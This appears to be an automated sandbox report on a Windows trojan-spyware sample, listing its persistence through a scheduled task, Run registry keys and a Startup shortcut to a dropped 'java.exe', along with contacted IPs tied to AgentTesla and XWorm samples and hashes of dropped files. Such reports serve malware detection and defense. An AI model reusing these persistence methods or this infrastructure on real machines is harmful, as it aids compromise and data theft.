                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:24
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@21/25@1/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 11.1%
                                                                        HCA Information:
                                                                        • Successful, ratio: 98%
                                                                        • Number of executed functions: 128
                                                                        • Number of non-executed functions: 7
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.23.161.164
                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                                                        • Execution Graph export aborted for target java.exe, PID 3088 because it is empty
                                                                        • Execution Graph export aborted for target java.exe, PID 3428 because it is empty
                                                                        • Execution Graph export aborted for target java.exe, PID 6464 because it is empty
                                                                        • Execution Graph export aborted for target java.exe, PID 7016 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3360 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 4512 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5932 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6116 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: file.exe
                                                                        TimeTypeDescription
                                                                        09:18:59API Interceptor184x Sleep call for process: file.exe modified
                                                                        09:19:02API Interceptor60x Sleep call for process: powershell.exe modified
                                                                        09:19:28API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        09:20:09API Interceptor4x Sleep call for process: java.exe modified
                                                                        15:20:09Task SchedulerRun new task: java path: C:\Users\user\AppData\Roaming\java.exe
                                                                        15:20:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run java C:\Users\user\AppData\Roaming\java.exe
                                                                        15:20:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run java C:\Users\user\AppData\Roaming\java.exe
                                                                        15:20:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        208.95.112.1Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                        • ip-api.com/json/?fields=225545
                                                                        Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        word.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        svchost.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Chrome.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Registry.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        OC LICITACI#U00d3N DICIEMBRE_24.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        103.230.121.124word.exeGet hashmaliciousXWormBrowse
                                                                          svchost.exeGet hashmaliciousXWormBrowse
                                                                            Chrome.exeGet hashmaliciousXWormBrowse
                                                                              Registry.exeGet hashmaliciousXWormBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                ip-api.comEnquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                • 208.95.112.1
                                                                                https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                • 208.95.112.2
                                                                                Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                word.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                svchost.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                Chrome.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                Registry.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                OC LICITACI#U00d3N DICIEMBRE_24.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                ax-0001.ax-msedge.netfile.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                • 150.171.28.10
                                                                                setup#U4f01#U4e1a#U540d#U5355.exeGet hashmaliciousUnknownBrowse
                                                                                • 150.171.27.10
                                                                                https://aysesuretobea.com/Get hashmaliciousUnknownBrowse
                                                                                • 150.171.27.10
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 150.171.27.10
                                                                                Scan_19112024_people_power_press.pdfGet hashmaliciousUnknownBrowse
                                                                                • 150.171.27.10
                                                                                CC_scan.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                • 150.171.27.10
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 150.171.27.10
                                                                                22.exeGet hashmaliciousUnknownBrowse
                                                                                • 150.171.28.10
                                                                                No. I20220052.exeGet hashmaliciousFormBookBrowse
                                                                                • 150.171.27.10
                                                                                https://www.google.rs/url?q=160CHARtTPSJ3J3wDyycT&sa=t&esrc=TYsrCFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/aloperdehatti.com/on/wTARVgfa92/%61%6C%65%73%73%69%61%2E%64%61%6E%69%65%6C%65%40%74%6F%6E%69%6E%63%61%73%61%2E%69%74&ugs=n8CoFFz5hZ4Yaxn3ZJryvKlaQxQ-BOyvjZ0GlahI9shjnWfTZ1du_w==Get hashmaliciousUnknownBrowse
                                                                                • 150.171.27.10
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                VPSQUANUSword.exeGet hashmaliciousXWormBrowse
                                                                                • 103.230.121.124
                                                                                svchost.exeGet hashmaliciousXWormBrowse
                                                                                • 103.230.121.124
                                                                                Chrome.exeGet hashmaliciousXWormBrowse
                                                                                • 103.230.121.124
                                                                                Registry.exeGet hashmaliciousXWormBrowse
                                                                                • 103.230.121.124
                                                                                qkbfi86.elfGet hashmaliciousMiraiBrowse
                                                                                • 103.252.19.63
                                                                                amen.arm.elfGet hashmaliciousUnknownBrowse
                                                                                • 43.225.59.17
                                                                                AIYi17AyGz.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                                • 198.44.176.141
                                                                                o88dYvhfkt.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                • 156.224.21.148
                                                                                file.exeGet hashmaliciousSliverBrowse
                                                                                • 198.44.168.104
                                                                                sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                                                                                • 23.251.54.212
                                                                                TUT-ASUSEnquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                • 208.95.112.1
                                                                                https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                • 208.95.112.2
                                                                                Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                word.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                svchost.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                Chrome.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                Registry.exeGet hashmaliciousXWormBrowse
                                                                                • 208.95.112.1
                                                                                OC LICITACI#U00d3N DICIEMBRE_24.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                No context
                                                                                No context
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.7263175011378977
                                                                                Encrypted:false
                                                                                SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0Z:9JZj5MiKNnNhoxuk
                                                                                MD5:FAA9F84C5D684D3E06B84FAB002F817D
                                                                                SHA1:BF1F8BDB002A1BD3431B351FE0A3F8EC8E772E9B
                                                                                SHA-256:C40BD5AAE054D17CE6F760B95F56C48A20B69A0BF18C5388FB762AE36ED6B7C5
                                                                                SHA-512:6B103B4EC0F6799160DA474C4D4BA4A0BF39566D12915D4083328BFA0A2D482195ABCDB81260FC8C28056028456B76DED26F8253710B0E4AA76BE2D92411D099
                                                                                Malicious:false
                                                                                Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0xe3e9a350, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.7556072070252107
                                                                                Encrypted:false
                                                                                SSDEEP:1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
                                                                                MD5:EF48379D182646658C3C48EC7A03D37E
                                                                                SHA1:F3435C1178B13B0100DAC1A1CDDCF17AF76D50B4
                                                                                SHA-256:83C9CDCF6B0CC5133B7D4584698B85B98A1034B81370857B504540D65C549DB4
                                                                                SHA-512:A2B4EFCBE4B379F698ECC071FB914CF66A7A053EF4619DEE226D27C99D4FA8DDF80C2C82FD4DE797DD85DE5738C8AAE13078B8E1B5ACB24DB067026A566CB90D
                                                                                Malicious:false
                                                                                Preview:..P... .......7.......X\...;...{......................0.e......!...{?......|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................F7.......|....................\......|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.0795882601702125
                                                                                Encrypted:false
                                                                                SSDEEP:3:7Jml/yYeO8ANaAPaU1lBhMjAilluxmO+l/SNxOf:7ol6ztANDPaU0jVgmOH
                                                                                MD5:1901737C957717B61B9643E1F1803682
                                                                                SHA1:ED0E46891031D57CE36D77EA67AC5BD3C5F37C60
                                                                                SHA-256:158502733AA5B0FC68E3B052903552C942E45D5D6161E9BA818A25E7BDB97E32
                                                                                SHA-512:615E8E569AA861B3A58F9D6D988A3A2DE8EF84145FC67FFEE739EBB12CADD26BBB99CD22C51186F905032C09AADABBFE85E55D714917F6F9EBFD8089791EC618
                                                                                Malicious:false
                                                                                Preview:..#,.....................................;...{.......|...!...{?..........!...{?..!...{?..g...!...{?...................\......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Roaming\java.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):654
                                                                                Entropy (8bit):5.380476433908377
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:Generic INItialization configuration [WIN]
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):3.6722687970803873
                                                                                Encrypted:false
                                                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                                                MD5:DE63D53293EBACE29F3F54832D739D40
                                                                                SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                                                SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                                                SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                                                Malicious:false
                                                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
